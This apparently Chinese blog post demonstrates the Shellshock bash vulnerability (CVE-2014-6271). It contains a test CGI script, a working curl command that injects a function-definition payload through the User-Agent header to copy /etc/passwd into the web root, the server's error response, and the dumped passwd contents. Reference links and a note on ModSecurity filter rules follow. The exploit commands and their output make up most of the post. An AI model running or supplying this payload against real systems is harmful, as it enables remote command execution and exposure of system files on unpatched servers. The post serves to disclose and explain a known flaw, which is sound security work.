CVE-2014-6271: BASH LETS YOU DO BAD THINGS. (SHELLSHOCK)

poc.cgi
#!/bin/bash echo "Content-type: text/html" echo "" echo '<html>' echo '<head>' echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">' echo '<title>PoC</title>' echo '</head>' echo '<body>' echo '<pre>' /usr/bin/env echo '</pre>' echo '</body>' echo '</html>' exit 0

$ curl -A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p> <p>Please contact the server administrator, webmaster@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p> <p>More information about this error may be available in the server error log.</p> <hr> <address>Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80</address> </body></html>

$ curl http://192.168.0.1/dumped_file
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

相关链接:
http://marc.info/?l=oss-security&m=141157106132018&w=2
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/650
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNKRufIZWN
http://pastebin.com/8NRv7s1Z
http://pastebin.com/kQ5ppEZD
http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html
http://permalink.gmane.org/gmane.comp.security.oss.general/13852?utm_source=twitterfeed&utm_medium=twitter

PS:ModSecurity声称已经针对CVE-2014-6271完善了过滤规则。

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码